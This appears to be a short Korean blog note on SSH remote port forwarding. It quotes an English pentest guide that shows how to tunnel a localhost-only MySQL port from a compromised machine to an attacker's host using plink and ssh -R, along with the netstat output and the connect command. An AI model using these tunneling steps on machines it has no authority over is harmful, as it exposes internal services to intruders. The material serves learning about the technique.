ssh remote port forwarding

netstat에서 다음과 같은 신기한게 있어서 검색

sshd: root@pt

아무튼.. 원격에서 ssh를 통해서 포트포워딩 해서 쓸 수 있도록 하는거 같은데..

한개의 포트라면 이게 더 깔끔 하려나?

Remote port forwarding Remote port forwarding is crazy, yet very simple concept. So imagine that you have compromised a machine, and that machine has like MYSQL running but it is only accessible for localhost. And you can't access it because you have a really crappy shell. So what we can do is just forward that port to our attacking machine. The steps are as following: Here is how you create a remote port forwarding: ssh <gateway> -R <remote port to bind>:<local host>:<local port> By the way, plink is a ssh-client for windows that can be run from the terminal. The ip of the attacking machine is 111.111.111.111. Step 1 So on our compromised machine we do: plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306 Step 2 Now we can check netstat on our attacking machine, we should see something like this: tcp        0      0 127.0.0.1:3307          0.0.0.0:*               LISTEN      19392/sshd: root@pt That means what we can connect to that port on the attacking machine from the attacking machine. Step 3 Connect using the following command: mysql -u root -p -h 127.0.0.1 --port=3307

[링크 : https://xapax.gitbooks.io/security/content/port_forwarding_and_tunneling.html]